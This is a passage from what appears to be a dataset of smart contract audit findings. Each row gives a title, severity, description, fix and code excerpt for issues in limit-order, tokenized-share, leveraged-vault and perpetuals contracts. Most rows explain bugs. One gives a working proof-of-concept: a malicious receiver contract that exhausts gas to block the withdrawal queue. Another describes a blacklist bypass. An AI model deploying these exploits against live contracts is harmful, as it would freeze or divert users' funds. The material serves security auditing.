back to caller.\\n if (msg.value > 0) sender.safeTransferETH(msg.value);\\n }\\n```\\n\\nUsers only need to pay for the gas cost for fulfilling the order when they claim the order to retrieve the swapped tokens. 
When the order is fulfilled, the swapped tokens will be sent to and stored in the `LimitOrderRegistry` contract.\\nHowever, in the event that the value of the swapped tokens crash (e.g., Terra's LUNA crash), it makes more economic sense for the users to abandon (similar to defaulting in traditional finance) the orders without claiming the worthless tokens to avoid paying the more expensive fee to the owner.\\nAs a result, many users will choose not to claim the orders, which result in the owner being unable to recoup back the gas fee the owner has already paid for automating the fulfillment of the orders, incurring loss and bad debt.","Consider collecting the fee in advance based on a rough estimation of the expected gas fee. When the users claim the order, any excess fee will be refunded, or any deficit will be collected from the users.\\nIn this case, if many users choose to abandon the orders, the owner will not incur any significant losses.","Owners might be unable to recoup back the gas fee the owner has already paid for automating the fulfillment of the orders, incurring loss and bad debt.","```\\nFile: LimitOrderRegistry.sol\\n function claimOrder(uint128 batchId, address user) external payable returns (ERC20, uint256) {\\n..SNIP..\\n // Transfer fee in.\\n address sender = _msgSender();\\n if (msg.value >= userClaim.feePerUser) {\\n // refund if necessary.\\n uint256 refund = msg.value - userClaim.feePerUser;\\n if (refund > 0) sender.safeTransferETH(refund);\\n } else {\\n WRAPPED_NATIVE.safeTransferFrom(sender, address(this), userClaim.feePerUser);\\n // If value is non zero send it back to caller.\\n if (msg.value > 0) sender.safeTransferETH(msg.value);\\n }\\n```\\n" +Owner unable to collect fulfillment fee from certain users due to revert error,medium,"Certain users might not be able to call the `claimOrder` function under certain conditions, resulting in the owner being unable to collect fulfillment fees from the users.\\n```\\nFile: 
LimitOrderRegistry.sol\\n function claimOrder(uint128 batchId, address user) external payable returns (ERC20, uint256) {\\n Claim storage userClaim = claim[batchId];\\n if (!userClaim.isReadyForClaim) revert LimitOrderRegistry__OrderNotReadyToClaim(batchId);\\n uint256 depositAmount = batchIdToUserDepositAmount[batchId][user];\\n if (depositAmount == 0) revert LimitOrderRegistry__UserNotFound(user, batchId);\\n\\n // Zero out user balance.\\n delete batchIdToUserDepositAmount[batchId][user];\\n\\n // Calculate owed amount.\\n uint256 totalTokenDeposited;\\n uint256 totalTokenOut;\\n ERC20 tokenOut;\\n\\n // again, remembering that direction == true means that the input token is token0.\\n if (userClaim.direction) {\\n totalTokenDeposited = userClaim.token0Amount;\\n totalTokenOut = userClaim.token1Amount;\\n tokenOut = poolToData[userClaim.pool].token1;\\n } else {\\n totalTokenDeposited = userClaim.token1Amount;\\n totalTokenOut = userClaim.token0Amount;\\n tokenOut = poolToData[userClaim.pool].token0;\\n }\\n\\n uint256 owed = (totalTokenOut * depositAmount) / totalTokenDeposited;\\n\\n // Transfer tokens owed to user.\\n tokenOut.safeTransfer(user, owed);\\n```\\n\\nAssume the following:\\nSHIB has 18 decimals of precision, while USDC has 6.\\nAlice (Small Trader) deposited 10 SHIB while Bob (Big Whale) deposited 100000000 SHIB.\\nThe batch order was fulfilled, and it claimed 9 USDC (totalTokenOut)\\nThe following formula and code compute the number of swapped/claimed USDC tokens a user is entitled to.\\n```\\nowed = (totalTokenOut * depositAmount) / totalTokenDeposited\\nowed = (9 USDC * 10 SHIB) / 100000000 SHIB\\nowed = (9 * 10^6 * 10 * 10^18) / (100000000 * 10^18)\\nowed = (9 * 10^6 * 10) / (100000000)\\nowed = 90000000 / 100000000\\nowed = 0 USDC (Round down)\\n```\\n\\nBased on the above assumptions and computation, Alice will receive zero tokens in return due to a rounding error in Solidity.\\nThe issue will be aggravated under the following 
conditions:\\nIf the difference in the precision between `token0` and `token1` in the pool is larger\\nThe token is a stablecoin, which will attract a lot of liquidity within a small price range (e.g. $0.95 ~ $1.05)\\nThe rounding down to zero is unavoidable in this scenario due to how values are represented. It is not possible to send Alice 0.9 WEI of USDC. The smallest possible amount is 1 WEI.\\nIn this case, it will attempt to transfer a zero amount of `tokenOut,` which might result in a revert as some tokens disallow the transfer of zero value. As a result, when users call the `claimOrder` function, it will revert, and the owner will not be able to collect the fulfillment fee from the users.\\n```\\n // Transfer tokens owed to user.\\n tokenOut.safeTransfer(user, owed);\\n```\\n","Consider only transferring the assets if the amount is more than zero.\\n```\\nuint256 owed = (totalTokenOut * depositAmount) / totalTokenDeposited;\\n\\n// Transfer tokens owed to user.\\n// Remove the line below\\n tokenOut.safeTransfer(user, owed);\\n// Add the line below\\n if (owed > 0) tokenOut.safeTransfer(user, owed);\\n```\\n","When a user cannot call the `claimOrder` function due to the revert error, the owner will not be able to collect the fulfillment fee from the user, resulting in a loss of fee for the owner.","```\\nFile: LimitOrderRegistry.sol\\n function claimOrder(uint128 batchId, address user) external payable returns (ERC20, uint256) {\\n Claim storage userClaim = claim[batchId];\\n if (!userClaim.isReadyForClaim) revert LimitOrderRegistry__OrderNotReadyToClaim(batchId);\\n uint256 depositAmount = batchIdToUserDepositAmount[batchId][user];\\n if (depositAmount == 0) revert LimitOrderRegistry__UserNotFound(user, batchId);\\n\\n // Zero out user balance.\\n delete batchIdToUserDepositAmount[batchId][user];\\n\\n // Calculate owed amount.\\n uint256 totalTokenDeposited;\\n uint256 totalTokenOut;\\n ERC20 tokenOut;\\n\\n // again, remembering that direction == true 
means that the input token is token0.\\n if (userClaim.direction) {\\n totalTokenDeposited = userClaim.token0Amount;\\n totalTokenOut = userClaim.token1Amount;\\n tokenOut = poolToData[userClaim.pool].token1;\\n } else {\\n totalTokenDeposited = userClaim.token1Amount;\\n totalTokenOut = userClaim.token0Amount;\\n tokenOut = poolToData[userClaim.pool].token0;\\n }\\n\\n uint256 owed = (totalTokenOut * depositAmount) / totalTokenDeposited;\\n\\n // Transfer tokens owed to user.\\n tokenOut.safeTransfer(user, owed);\\n```\\n"
+Bypass the blacklist restriction because the blacklist check is not done when minting or burning,high,"Bypass the blacklist restriction because the blacklist check is not done when minting or burning\\nIn the whitepaper:\\nthe protocol emphasizes that they implement a blacklist feature for enforcing OFAC, AML and other account security requirements. A blacklisted address will not be able to send or receive tokens\\nthe protocol wants to use the whitelist feature to be compliant and not let the blacklisted address send or receive dShares\\nFor this reason, before token transfer, the protocol checks if address from or address to is blacklisted, but the blacklisted address can still create a buy order or sell order\\n```\\n function _beforeTokenTransfer(address from, address to, uint256) internal virtual override {\\n // Restrictions ignored for minting and burning\\n // If transferRestrictor is not set, no restrictions are applied\\n\\n // @audit\\n // why don't you not apply mint and burn in blacklist?\\n if (from == address(0) || to == address(0) || address(transferRestrictor) == address(0)) {\\n return;\\n }\\n\\n // Check transfer restrictions\\n transferRestrictor.requireNotRestricted(from, to);\\n }\\n```\\n\\nthis is calling\\n```\\nfunction requireNotRestricted(address from, address to) external view virtual {\\n // Check if either account is restricted\\n if (blacklist[from] || blacklist[to]) {\\n revert AccountRestricted();\\n }\\n // Otherwise, do 
nothing\\n}\\n```\\n\\nbut as we can see, when the dShare token is burned or minted, the blacklist does not apply to address(to)\\nthis allows the blacklisted receiver to bypass the blacklist restriction and still send and receive dShares and cash out their dShares\\nbecause the minting dShares is not blacklisted\\na blacklisted user create a buy order with payment token and set the order receiver to a non-blacklisted address\\nthen later when the buy order is filled, the new dShares is transferred and minted to an not-blacklisted address\\nbecause the burning dShares is not blacklisted\\nbefore the user is blacklisted, a user can frontrun the blacklist transaction to create a sell order and transfer the dShares into the OrderProcessor\\nthen later when the sell order is filled, the dShares in burnt from the SellOrderProcess escrow are burnt and the user can receive the payment token","Issue Bypass the blacklist restriction because the blacklist check is not done when minting or burning\\nimplement proper check when burning and minting of the dShares to not let user game the blacklist system, checking if the receiver of the dShares is blacklisted when minting, before filling sell order and burn the dShares, check if the requestor of the sell order is blacklisted\\ndo not let blacklisted address create buy order and sell order",Bypass the blacklist restriction because the blacklist check is not done when minting or burning,"```\\n function _beforeTokenTransfer(address from, address to, uint256) internal virtual override {\\n // Restrictions ignored for minting and burning\\n // If transferRestrictor is not set, no restrictions are applied\\n\\n // @audit\\n // why don't you not apply mint and burn in blacklist?\\n if (from == address(0) || to == address(0) || address(transferRestrictor) == address(0)) {\\n return;\\n }\\n\\n // Check transfer restrictions\\n transferRestrictor.requireNotRestricted(from, to);\\n }\\n```\\n" +Escrow record not cleared on cancellation 
and order fill,medium,"In `DirectBuyIssuer.sol`, a market buy requires the operator to take the payment token as escrow prior to filling the order. Checks are in place so that the math works out in terms of how much escrow has been taken vs the order's remaining fill amount. However, if the user cancels the order or fill the order, the escrow record is not cleared.\\nThe escrow record will exists as a positive amount which can lead to accounting issues.\\nTake the following example:\\nOperator broadcasts a `takeEscrow()` transaction around the same time that the user calls `requestCancel()` for the order\\nOperator also broadcasts a `cancelOrder()` transaction\\nIf the `cancelOrder()` transaction is mined before the `takeEscrow()` transaction, then the contract will transfer out token when it should not be able to.\\n`takeEscrow()` simply checks that the `getOrderEscrow[orderId]` is less than or equal to the requested amount:\\n```\\n bytes32 orderId = getOrderIdFromOrderRequest(orderRequest, salt);\\n uint256 escrow = getOrderEscrow[orderId];\\n if (amount > escrow) revert AmountTooLarge();\\n\\n\\n // Update escrow tracking\\n getOrderEscrow[orderId] = escrow - amount;\\n // Notify escrow taken\\n emit EscrowTaken(orderId, orderRequest.recipient, amount);\\n\\n\\n // Take escrowed payment\\n IERC20(orderRequest.paymentToken).safeTransfer(msg.sender, amount);\\n```\\n\\nCancelling the order does not clear the `getOrderEscrow` record:\\n```\\n function _cancelOrderAccounting(OrderRequest calldata order, bytes32 orderId, OrderState memory orderState)\\n internal\\n virtual\\n override\\n {\\n // Prohibit cancel if escrowed payment has been taken and not returned or filled\\n uint256 escrow = getOrderEscrow[orderId];\\n if (orderState.remainingOrder != escrow) revert UnreturnedEscrow();\\n\\n\\n // Standard buy order accounting\\n super._cancelOrderAccounting(order, orderId, orderState);\\n }\\n}\\n```\\n\\nThis can lead to an good-faith and trusted operator 
accidentally taking funds from the contract that should not be able to leave.\\ncoming up with the fact that the transaction does not have deadline or expiration date:\\nconsider the case below:\\na good-faith operator send a transaction, takeEscrow\\nthe transaction is pending in the mempool for a long long long time\\nthen user fire a cancel order request\\nthe operator help user cancel the order\\nthe operator send a transcation cancel order\\ncancel order transaction land first\\nthe takeEscrow transaction lands\\nbecause escrow state is not clear up, the fund (other user's fund) is taken\\nIt's also worth noting that the operator would not be able to call `returnEscrow()` because the order state has already been cleared by the cancellation. `getRemainingOrder()` would return 0.\\n```\\n function returnEscrow(OrderRequest calldata orderRequest, bytes32 salt, uint256 amount)\\n external\\n onlyRole(OPERATOR_ROLE)\\n {\\n // No nonsense\\n if (amount == 0) revert ZeroValue();\\n // Can only return unused amount\\n bytes32 orderId = getOrderIdFromOrderRequest(orderRequest, salt);\\n uint256 remainingOrder = getRemainingOrder(orderId);\\n uint256 escrow = getOrderEscrow[orderId];\\n // Unused amount = remaining order - remaining escrow\\n if (escrow + amount > remainingOrder) revert AmountTooLarge();\\n```\\n",Clear the escrow record upon canceling the order.,Issue Escrow record not cleared on cancellation and order fill\\nInsolvency due to pulling escrow that should not be allowed to be taken,"```\\n bytes32 orderId = getOrderIdFromOrderRequest(orderRequest, salt);\\n uint256 escrow = getOrderEscrow[orderId];\\n if (amount > escrow) revert AmountTooLarge();\\n\\n\\n // Update escrow tracking\\n getOrderEscrow[orderId] = escrow - amount;\\n // Notify escrow taken\\n emit EscrowTaken(orderId, orderRequest.recipient, amount);\\n\\n\\n // Take escrowed payment\\n IERC20(orderRequest.paymentToken).safeTransfer(msg.sender, amount);\\n```\\n" +"Cancellation refunds 
should return tokens to order creator, not recipient",medium,"When an order is cancelled, the refund is sent to `order.recipient` instead of the order creator because it is the order creator (requestor) pay the payment token for buy order or pay the dShares for sell order\\nAs is the standard in many L1/L2 bridges, cancelled deposits should be returned to the order creator instead of the recipient. In Dinari's current implementation, a refund acts as a transfer with a middle-man.\\nSimply, the `_cancelOrderAccounting()` function returns the refund to the order.recipient:\\n```\\n function _cancelOrderAccounting(OrderRequest calldata orderRequest, bytes32 orderId, OrderState memory orderState)\\n internal\\n virtual\\n override\\n {\\n // rest of code\\n\\n uint256 refund = orderState.remainingOrder + feeState.remainingPercentageFees;\\n\\n // rest of code\\n\\n if (refund + feeState.feesEarned == orderRequest.quantityIn) {\\n _closeOrder(orderId, orderRequest.paymentToken, 0);\\n // Refund full payment\\n refund = orderRequest.quantityIn;\\n } else {\\n // Otherwise close order and transfer fees\\n _closeOrder(orderId, orderRequest.paymentToken, feeState.feesEarned);\\n }\\n\\n\\n // Return escrow\\n IERC20(orderRequest.paymentToken).safeTransfer(orderRequest.recipient, refund);\\n }\\n```\\n\\nRefunds should be returned to the order creator in cases where the input recipient was an incorrect address or simply the user changed their mind prior to the order being filled.","Return the funds to the order creator, not the recipient.",Potential for irreversible loss of funds\\nInability to truly cancel order,"```\\n function _cancelOrderAccounting(OrderRequest calldata orderRequest, bytes32 orderId, OrderState memory orderState)\\n internal\\n virtual\\n override\\n {\\n // rest of code\\n\\n uint256 refund = orderState.remainingOrder + feeState.remainingPercentageFees;\\n\\n // rest of code\\n\\n if (refund + feeState.feesEarned == orderRequest.quantityIn) {\\n 
_closeOrder(orderId, orderRequest.paymentToken, 0);\\n // Refund full payment\\n refund = orderRequest.quantityIn;\\n } else {\\n // Otherwise close order and transfer fees\\n _closeOrder(orderId, orderRequest.paymentToken, feeState.feesEarned);\\n }\\n\\n\\n // Return escrow\\n IERC20(orderRequest.paymentToken).safeTransfer(orderRequest.recipient, refund);\\n }\\n```\\n" +`reduce_position` doesn't update margin mapping correctly,high,"`reduce_position` function decrease the margin amount of the position but doesn't add it back to the user's margin mapping, making it impossible to withdraw the margin.\\nAfter selling some position tokens back against debt tokens using `reduce_position` function, `debt_shares` and `margin_amount` are reduced proportionally to keep leverage the same as before:\\nVault.vy#L313-L330\\n```\\ndebt_amount: uint256 = self._debt(_position_uid)\\n margin_debt_ratio: uint256 = position.margin_amount * PRECISION / debt_amount\\n\\n\\n amount_out_received: uint256 = self._swap(\\n position.position_token, position.debt_token, _reduce_by_amount, min_amount_out\\n )\\n\\n\\n # reduce margin and debt, keep leverage as before\\n reduce_margin_by_amount: uint256 = (\\n amount_out_received * margin_debt_ratio / PRECISION\\n )\\n reduce_debt_by_amount: uint256 = amount_out_received - reduce_margin_by_amount\\n\\n\\n position.margin_amount -= reduce_margin_by_amount\\n\\n\\n burnt_debt_shares: uint256 = self._repay(position.debt_token, reduce_debt_by_amount)\\n position.debt_shares -= burnt_debt_shares\\n position.position_amount -= _reduce_by_amount\\n```\\n\\nHowever, even though some of the margin have been paid back (position.margin_amount has been reduced), `self.margin[position.account][position.debt_token]` mapping hasn't been updated by adding `reduce_margin_by_amount` which would allow the user to withdraw his margin.","Consider modifying the code like this:\\n```\\n reduce_debt_by_amount: uint256 = amount_out_received - 
reduce_margin_by_amount\\n\\n\\n position.margin_amount -= reduce_margin_by_amount\\n+ self.margin[position.account][position.debt_token] += reduce_margin_by_amount\\n\\n burnt_debt_shares: uint256 = self._repay(position.debt_token, reduce_debt_by_amount)\\n position.debt_shares -= burnt_debt_shares\\n position.position_amount -= _reduce_by_amount\\n```\\n",Users will lose their margin tokens.,"```\\ndebt_amount: uint256 = self._debt(_position_uid)\\n margin_debt_ratio: uint256 = position.margin_amount * PRECISION / debt_amount\\n\\n\\n amount_out_received: uint256 = self._swap(\\n position.position_token, position.debt_token, _reduce_by_amount, min_amount_out\\n )\\n\\n\\n # reduce margin and debt, keep leverage as before\\n reduce_margin_by_amount: uint256 = (\\n amount_out_received * margin_debt_ratio / PRECISION\\n )\\n reduce_debt_by_amount: uint256 = amount_out_received - reduce_margin_by_amount\\n\\n\\n position.margin_amount -= reduce_margin_by_amount\\n\\n\\n burnt_debt_shares: uint256 = self._repay(position.debt_token, reduce_debt_by_amount)\\n position.debt_shares -= burnt_debt_shares\\n position.position_amount -= _reduce_by_amount\\n```\\n" +Leverage calculation is wrong,high,"Leverage calculation is wrong which will lead to unfair liquidations or over leveraged positions depending on price movements.\\n`_calculate_leverage` miscalculate the leverage by using `_debt_value + _margin_value` as numerator instead of `_position_value` :\\nVault.vy#L465-L477\\n```\\ndef _calculate_leverage(\\n _position_value: uint256, _debt_value: uint256, _margin_value: uint256\\n) -> uint256:\\n if _position_value <= _debt_value:\\n # bad debt\\n return max_value(uint256)\\n\\n\\n return (\\n PRECISION\\n * (_debt_value + _margin_value)\\n / (_position_value - _debt_value)\\n / PRECISION\\n )\\n```\\n\\nThe three inputs of the function `_position_value`, `_debt_value` and `_margin_value` are all determined by a chainlink oracle price feed. 
`_debt_value` represents the value of the position's debt share converted to debt amount in USD. `_margin_value` represents the current value of the position's initial margin amount in USD. `_position_value` represents the current value of the position's initial position amount in USD.\\nThe problem with the above calculation is that `_debt_value + _margin_value` does not represent the value of the position. The leverage is the ratio between the current value of the position and the current margin value. `_position_value - _debt_value` is correct and is the current margin value, but `_debt_value + _margin_value` doesn't represent the current value of the position since there is no guarantee that the debt token and the position token have correlated price movements.\\nExample: debt token: ETH, position token: BTC.\\nAlice uses 1 ETH of margin to borrow 14 ETH (2k USD/ETH) and get 1 BTC (30k USD/BTC) of position token. Leverage is 14.\\nThe next day, the price of ETH in USD is still 2k USD/ETH but BTC price in USD went down from 30k to 29k USD/BTC. Leverage is now (_position_value == 29k) / (_position_value == 29k - _debt_value == 28k) = 29, instead of what is calculated in the contract: (_debt_value == 28k + _margin_value == 2k) / (_position_value == 29k - _debt_value == 28k) = 30.","Consider modifying the code like this:\\n```\\ndef _calculate_leverage(\\n _position_value: uint256, _debt_value: uint256, _margin_value: uint256\\n) -> uint256:\\n if _position_value <= _debt_value:\\n # bad debt\\n return max_value(uint256)\\n\\n\\n return (\\n PRECISION\\n- * (_debt_value + _margin_value)\\n+ * (_position_value)\\n / (_position_value - _debt_value)\\n / PRECISION\\n )\\n```\\n\\nEscalate for 10 USDC. My report shows why the current used formula is wrong as it does not take into account that debt tokens and position tokens are not necessarily tokens with correlated prices. 
The duplicate #100 shows in another way that the formula fails to calculate the leverage of a position correctly. The impact is the same, but my report highlights `_debt_value + _margin_value != _position_value`, the same way that the debt against a house is not equal to the market value of this house (also described in another way in #156). The definition of leverage used in the code is not correct and will lead to unfair liquidations or over leveraged positions, which is definitely high severity.\\nUnexpected and unfair liquidation could cause loss to users. Since the issue stems from the formula, the loss could be long term, resulting in accumulated fund loss for users, and can be deemed as ""material loss of funds"".\\nBased on the above, high severity might be appropriate.\\nUnstoppable-DeFi\\nhrishibhat\\n@Unstoppable-DeFi based on the above escalation it seems to be a high issue. Is there any other reason this should not be a high-severity issue?\\nhrishibhat\\nResult: High Has duplicates Considering this issue a valid high\\nsherlock-admin2\\nEscalations have been resolved successfully!\\nEscalation status:\\ntwicek: accepted",Leverage calculation is wrong, which will lead to unfair liquidations or over leveraged positions depending on price movements.,"```\\ndef _calculate_leverage(\\n _position_value: uint256, _debt_value: uint256, _margin_value: uint256\\n) -> uint256:\\n if _position_value <= _debt_value:\\n # bad debt\\n return max_value(uint256)\\n\\n\\n return (\\n PRECISION\\n * (_debt_value + _margin_value)\\n / (_position_value - _debt_value)\\n / PRECISION\\n )\\n```\\n" 
+Interest calculated is amplified by a multiple of 1000 in `_debt_interest_since_last_update`,high,"Interest calculated in the `_debt_interest_since_last_update` function is amplified by a multiple of 1000 and hence can completely brick the system and debt calculation. 
Because we divide by PERCENTAGE_BASE instead of PERCENTAGE_BASE_HIGH, which has more precision and which is used in the utilization calculation.\\nThe following function calculates the interest accrued over a certain interval:\\n```\\ndef _debt_interest_since_last_update(_debt_token: address) -> uint256:\\n\\n return (\\n\\n (block.timestamp - self.last_debt_update[_debt_token])* self._current_interest_per_second(_debt_token)\\n * self.total_debt_amount[_debt_token]\\n / PERCENTAGE_BASE \\n / PRECISION\\n )\\n```\\n\\nBut the results from the above function are amplified by a factor of 1000 because the interest per second, as per the test file, is calculated as follows:\\n```\\n # accordingly the current interest per year should be 3% so 3_00_000\\n # per second that is (300000*10^18)/(365*24*60*60)\\n expected_interest_per_second = 9512937595129375\\n\\n assert (\\n expected_interest_per_second\\n == vault_configured.internal._current_interest_per_second(usdc.address)\\n )\\n```\\n\\nSo yearly interest has a precision of 5, as it is calculated using the utilization rate and `PERCENTAGE_BASE_HIGH_PRECISION`, which has a precision of 5, and per second has a precision of 18, so the final value has a precision of 23.\\nInterest per second has precision = 23.\\nBut if we look at the code:\\n```\\n (block.timestamp - self.last_debt_update[_debt_token])* self._current_interest_per_second(_debt_token)\\n * self.total_debt_amount[_debt_token]\\n / PERCENTAGE_BASE \\n / PRECISION\\n```\\n\\nWe divide by PERCENTAGE_BASE that is = 100_00 = precision of => 2 And then by PRECISION = 1e18 => precision of 18. 
So accumulated precision of 20, where as we should have divided by value precises to 23 to match the nominator.\\nWhere is we should have divided by PERCENTAGE_BASE_HIGH instead of PERCENTAGE_BASE\\nHence the results are amplified by enormous multiple of thousand.","Use PERCENTAGE_BASE_HIGH in division instead of PERCENTAGE_BASE.\\nEscalate for 10 USDC\\nThis should be high as described impact in the given submission and the duplicate too.\\nA magnitude of 1000 times of interest can be deemed as ""material loss of funds"".\\n141345\\nEscalate for 10 USDC The wrong calculation of interest rates will cause a direct loss of funds to users. This should definitely be high severity.\\nSame as above\\nhrishibhat\\nResult: High Has duplicates Considering this a valid high\\nsherlock-admin2\\nEscalations have been resolved successfully!\\nEscalation status:\\nNabeel-javaid: accepted\\ntwicek: accepted","Interest are too much amplified, that impacts the total debt calculation and brick whole leverage, liquidation and share mechanism.\\nNote: Dev confirmed that the values being used in the tests are the values that will be used in production.",```\\ndef _debt_interest_since_last_update(_debt_token: address) -> uint256:\\n\\n return (\\n\\n (block.timestamp - self.last_debt_update[_debt_token])* self._current_interest_per_second(_debt_token)\\n * self.total_debt_amount[_debt_token]\\n / PERCENTAGE_BASE \\n / PRECISION\\n )\\n```\\n +Hedgers are not incentivized to respond to user's closing requests,medium,"Hedgers could intentionally force the users to close the positions themselves via the `forceClosePosition` and charge a spread to earn more, which results in the users closing at a worse price, leading to a loss of profit for them.\\nHow `fillCloseRequest` function works?\\nFor a Long position, when PartyB (Hedger) calls the `fillCloseRequest` function to fill a close position under normal circumstances, the hedger cannot charge a spread because the hedger has to close at 
the user's requested close price (quote.requestedClosePrice),\\nIf the hedger decides to close at a higher price, it is permissible by the function, but the hedger will lose more, and the users will gain more because the users' profit is computed based on `long profit = closing price - opening price`.\\nUnder normal circumstances, most users will set the requested close price (quote.requestedClosePrice) close to the market price most of the time.\\nIn short, the `fillCloseRequest` function requires the hedger to match or exceed the user' requested price. The hedger cannot close at a price below the user's requested price in order to charge a spread.\\n```\\nfunction fillCloseRequest(\\n..SNIP..\\n if (quote.positionType == PositionType.LONG) {\\n require(\\n closedPrice >= quote.requestedClosePrice,\\n ""PartyBFacet: Closed price isn't valid""\\n )\\n```\\n\\nHow `forceClosePosition` function works?\\nFor a Long position, the `forceCloseGapRatio` will allow the hedger to charge a spread from the user's requested price (quote.requestedClosePrice) when the user (PartyA) attempts to force close the position.\\nThe `upnlSig.price` is the market price and `quote.requestedClosePrice` is the price users ask to close at. 
By having the `forceCloseGapRatio`, assuming that `forceCloseGapRatio` is 5%, this will create a spread between the two prices (upnlSig.price and quote.requestedClosePrice) that represent a cost that the users (PartyA) need to ""pay"" in order to force close a position.\\n```\\nfunction forceClosePosition(uint256 quoteId, PairUpnlAndPriceSig memory upnlSig) internal {\\n..SNIP..\\n if (quote.positionType == PositionType.LONG) {\\n require(\\n upnlSig.price >=\\n quote.requestedClosePrice +\\n (quote.requestedClosePrice * maLayout.forceCloseGapRatio) /\\n 1e18,\\n ""PartyAFacet: Requested close price not reached""\\n );\\n ..SNIP..\\n LibQuote.closeQuote(quote, filledAmount, quote.requestedClosePrice);\\n```\\n\\nIssue with current design\\nAssume a hedger ignores the user's close request. In this case, the users (PartyA) have to call the `forceClosePosition` function by themselves to close the position and pay a spread.\\nThe hedgers can abuse this mechanic to their benefit. Assuming the users (PartyA) ask to close a LONG position at a fair value, and the hedgers respond by calling the `fillCloseRequest` to close it. In this case, the hedgers won't be able to charge a spread because the hedgers are forced to close at a price equal to or higher than the user's asking closing price (quote.requestedClosePrice).\\nHowever, if the hedger chooses to ignore the user's close request, this will force the user to call the `forceClosePosition,` and the user will have to pay a spread to the hedgers due to the gap ratio. In this case, the hedgers will benefit more due to the spread.\\nIn the long run, the hedgers will be incentivized to ignore users' close requests.","Hedgers should not be entitled to charge a spread within the `forceClosePosition` function because some hedgers might intentionally choose not to respond to user requests in order to force the users to close the position themselves. 
In addition, hedgers are incentivized to force users to close the position themselves as the `forceClosePosition` function allows them the charge a spread.\\nWithin the `forceClosePosition` function, consider removing the gap ratio to remove the spread and fill the position at the market price (upnlSig.price).\\n```\\n function forceClosePosition(uint256 quoteId, PairUpnlAndPriceSig memory upnlSig) internal {\\n..SNIP..\\n if (quote.positionType == PositionType.LONG) {\\n require(\\n upnlSig.price >=\\n// Add the line below\\n quote.requestedClosePrice, \\n// Remove the line below\\n quote.requestedClosePrice // Add the line below\\n\\n// Remove the line below\\n (quote.requestedClosePrice * maLayout.forceCloseGapRatio) /\\n// Remove the line below\\n 1e18,\\n ""PartyAFacet: Requested close price not reached""\\n );\\n } else {\\n require(\\n upnlSig.price <=\\n// Add the line below\\n quote.requestedClosePrice,\\n// Remove the line below\\n quote.requestedClosePrice // Remove the line below\\n\\n// Remove the line below\\n (quote.requestedClosePrice * maLayout.forceCloseGapRatio) /\\n// Remove the line below\\n 1e18,\\n ""PartyAFacet: Requested close price not reached""\\n );\\n }\\n..SNIP..\\n// Remove the line below\\n LibQuote.closeQuote(quote, filledAmount, quote.requestedClosePrice);\\n// Add the line below\\n LibQuote.closeQuote(quote, filledAmount, upnlSig.price);\\n }\\n```\\n\\nFor long-term improvement to the protocol, assuming that the user's requested price is of fair value:\\nHedger should be penalized for not responding to the user's closing request in a timely manner; OR\\nHegder should be incentivized to respond to the user's closing request. For instance, they are entitled to charge a spread if they respond to user closing requests.","The hedgers will be incentivized to ignore users' close requests, resulting in the users having to wait for the cooldown before being able to force close a position themselves. 
The time spent waiting could potentially lead to a loss of opportunity cost for the users.\\nIn addition, hedgers could intentionally force the users to close the positions themselves via the `forceClosePosition` and charge a spread to earn more, which results in the users closing at a worse price, leading to a loss of profit for them.","```\\nfunction fillCloseRequest(\\n..SNIP..\\n if (quote.positionType == PositionType.LONG) {\\n require(\\n closedPrice >= quote.requestedClosePrice,\\n ""PartyBFacet: Closed price isn't valid""\\n )\\n```\\n" +ProcessWithdrawals is still DOS-able,high,"DOS on process withdrawals were reported in the previous code4rena audit however the fix does not actually stop DOS, it only makes it more expensive. There is a much cheaper way to DOS the withdrawal queue - that is by specifying the `usr` to be a smart contract that consumes all the gas.\\n```\\n// SPDX-License-Identifier: UNLICENSED\\npragma solidity 0.8.9;\\nimport ""./Utils.sol"";\\n\\ncontract MaliciousReceiver {\\n uint256 public gas;\\n receive() payable external {\\n gas = gasleft();\\n for(uint256 i = 0; i < 150000; i++) {} // 140k iteration uses about 28m gas. 
150k uses slightly over 30m.\\n }\\n}\\n\\ncontract VUSDWithReceiveTest is Utils {\\n event WithdrawalFailed(address indexed trader, uint amount, bytes data);\\n\\n function setUp() public {\\n setupContracts();\\n }\\n\\n function test_CannotProcessWithdrawals(uint128 amount) public {\\n MaliciousReceiver r = new MaliciousReceiver();\\n\\n vm.assume(amount >= 5e6);\\n // mint vusd for this contract\\n mintVusd(address(this), amount);\\n // alice and bob also mint vusd\\n mintVusd(alice, amount);\\n mintVusd(bob, amount);\\n\\n // withdraw husd\\n husd.withdraw(amount); // first withdraw in the array\\n vm.prank(alice);\\n husd.withdraw(amount);\\n vm.prank(bob); // Bob is the malicious user and he wants to withdraw the VUSD to his smart contract\\n husd.withdrawTo(address(r), amount);\\n\\n assertEq(husd.withdrawalQLength(), 3);\\n assertEq(husd.start(), 0);\\n\\n husd.processWithdrawals(); // This doesn't fail on foundry because foundry's gas limit is way higher than ethereum's. \\n\\n uint256 ethereumSoftGasLimit = 30_000_000;\\n assertGt(r.gas(), ethereumSoftGasLimit); // You can only transfer at most 63/64 gas to an external call and the fact that the recorded amt of gas is > 30m shows that processWithdrawals will always revert when called on mainnet. \\n }\\n\\n receive() payable external {\\n assertEq(msg.sender, address(husd));\\n }\\n}\\n```\\n\\nCopy and paste this file into the test/foundry folder and run it.\\nThe test will not fail because foundry has a very high gas limit but you can see from the test that the amount of gas that was recorded in the malicious contract is higher than 30m (which is the current gas limit on ethereum). If you ran the test by specifying the —gas-limit i.e. 
`forge test -vvv --match-path test/foundry/VUSDRevert.t.sol --gas-limit 30000000` The test will fail with `Reason: EvmError: OutOfGas` because there is not enough gas to transfer to the malicious contract to run 150k iterations.",From best recommendation to worst\\nRemove the queue and `withdraw` the assets immediately when `withdraw` is called.\\nAllow users to process withdrawals by specifying the index index\\nAllow the admin to remove these bad withdrawals from the queue\\nAllow the admin to adjust the start position to skip these bad withdrawals.,Users will lose their funds and have their VUSD burnt forever because nobody is able to process any withdrawals.,"```\\n// SPDX-License-Identifier: UNLICENSED\\npragma solidity 0.8.9;\\nimport ""./Utils.sol"";\\n\\ncontract MaliciousReceiver {\\n uint256 public gas;\\n receive() payable external {\\n gas = gasleft();\\n for(uint256 i = 0; i < 150000; i++) {} // 140k iteration uses about 28m gas. 150k uses slightly over 30m.\\n }\\n}\\n\\ncontract VUSDWithReceiveTest is Utils {\\n event WithdrawalFailed(address indexed trader, uint amount, bytes data);\\n\\n function setUp() public {\\n setupContracts();\\n }\\n\\n function test_CannotProcessWithdrawals(uint128 amount) public {\\n MaliciousReceiver r = new MaliciousReceiver();\\n\\n vm.assume(amount >= 5e6);\\n // mint vusd for this contract\\n mintVusd(address(this), amount);\\n // alice and bob also mint vusd\\n 